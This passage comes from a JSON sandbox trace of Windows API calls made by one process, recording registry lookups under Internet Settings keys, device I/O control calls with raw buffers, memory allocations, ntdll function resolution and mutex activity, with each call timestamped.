"parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "3" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\Flags" } ], "repeated": 0, "id": 728 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e0" } ], "repeated": 0, "id": 729 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 730 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": false, "return": "0xffffffff8000001a", "pretty_return": "NO_MORE_ENTRIES", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "5" } ], "repeated": 0, "id": 731 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 732 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "6820", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 733 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "6820", "caller": "0x764fdce4", "parentcaller": "0x76f68bc0", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000003dc" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 734 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "6820", "caller": "0x771b81f9", "parentcaller": "0x76f5d0b9", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 735 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00741000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 736 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73991d6b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 737 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21aad", "parentcaller": "0x73991a69", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x0012000f" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf0\\xfb,\\x04i\\x1a\\x99s\\x01\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfb,\\x04\\x08\\x00\\x00\\x00" } ], "repeated": 0, "id": 738 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21ad2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 739 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 740 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00742000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 741 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73991d6b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 742 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21aad", "parentcaller": "0x73991a69", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x0012000f" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xd4\\xfb,\\x04i\\x1a\\x99s\\x01\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfb,\\x04\\x08\\x00\\x00\\x00" } ], "repeated": 0, "id": 743 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21ad2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 744 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 745 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "8848", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 746 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "8848", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00743000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 747 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73991d6b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 748 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e0bbf", "parentcaller": "0x727aa6ae", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 749 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21aad", "parentcaller": "0x73991a69", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x0012000f" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xd4\\xfb,\\x04i\\x1a\\x99s\\x01\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00L\\xfb,\\x04\\x08\\x00\\x00\\x00" } ], "repeated": 0, "id": 750 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21ad2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 751 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x7277a9f2", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 752 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x7277a708", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 753 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x7277aa58", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 754 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 755 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00744000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 756 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73991d6b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 757 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21941", "parentcaller": "0x71e2781a", "category": "device", "api": "NtDeviceIoControlFile", "status": false, "return": "0xffffffffc0000225", "pretty_return": "NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x00120007" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\xe2q\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xf6,\\x048\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\xf7,\\x04\\x04\\x00\\x00\\x00|\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 758 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21966", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 759 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21941", "parentcaller": "0x71e2781a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x00120007" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\xe2q\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xf6,\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\xf7,\\x04\\x04\\x00\\x00\\x00X\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\xe2q\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xf6,\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\xf7,\\x04\\x04\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf0\\xf6,\\x04\\x1ax\\xe2q\\x01\\x00\\x00\\x00`\\x1b\\xe2q\\x00\\x00\\x00\\x00\\xb0\\xf6,\\x04" } ], "repeated": 0, "id": 760 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21966", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 761 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21941", "parentcaller": "0x71e26809", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x00120007" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xea,\\x04\\x04\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xc8\\xf7,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xea,\\x04\\x04\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xc8\\xf7,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00P\\xea,\\x04\th\\xe2q\\x01\\x00\\x00\\x000\\x1b\\xe2q\\x02\\x00\\x00\\x00X\\xea,\\x04" } ], "repeated": 0, "id": 762 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21966", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 763 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21941", "parentcaller": "0x71e2629a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x00120007" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xea,\\x04\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\xea,\\x04\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf0\\xf6,\\x04\\x9ab\\xe2q\\x01\\x00\\x00\\x000\\x1b\\xe2q\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 764 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21966", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 765 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21aad", "parentcaller": "0x71e26306", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x0012000f" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\xea,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\xf0,\\x04\\x90\\x02\\x00\\x00\\x80\\xeb,\\x048\\x02\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\xea,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\xf0,\\x04\\x90\\x02\\x00\\x00\\x80\\xeb,\\x048\\x02\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf0\\xf6,\\x04\\x06c\\xe2q\\x01\\x00\\x00\\x000\\x1b\\xe2q\\x01\\x00\\x00\\x00x\\xea,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 766 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21ad2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 767 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x75b21941", "parentcaller": "0x71e2629a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000354" }, { "name": "IoControlCode", "value": "0x00120007" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\xea,\\x04\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\xe2q\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\xea,\\x04\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf8\\xf6,\\x04\\x9ab\\xe2q\\x01\\x00\\x00\\x000\\x1b\\xe2q\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 768 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21966", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 769 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72779012", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 770 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x7277a98b", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 771 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21ad2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 0, "id": 772 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72719063", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 773 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e15a7", "parentcaller": "0x727d55dc", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" }, { "name": "MutexName", "value": "Local\\SM0:3552:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 774 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x727da25f", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 775 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 776 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000440" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 777 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x727d61be", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000440" } ], "repeated": 0, "id": 778 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764de6a0", "parentcaller": "0x727d901e", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000043c" } ], "repeated": 1, "id": 779 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "388", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 780 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002fc" }, { "name": "ValueName", "value": "CreateUriCacheSize" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize" } ], "repeated": 0, "id": 781 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002e0" }, { "name": "ValueName", "value": "CreateUriCacheSize" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize" } ], "repeated": 0, "id": 782 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000027c" }, { "name": "ValueName", "value": "CreateUriCacheSize" }, { "name": "FullName", "value": 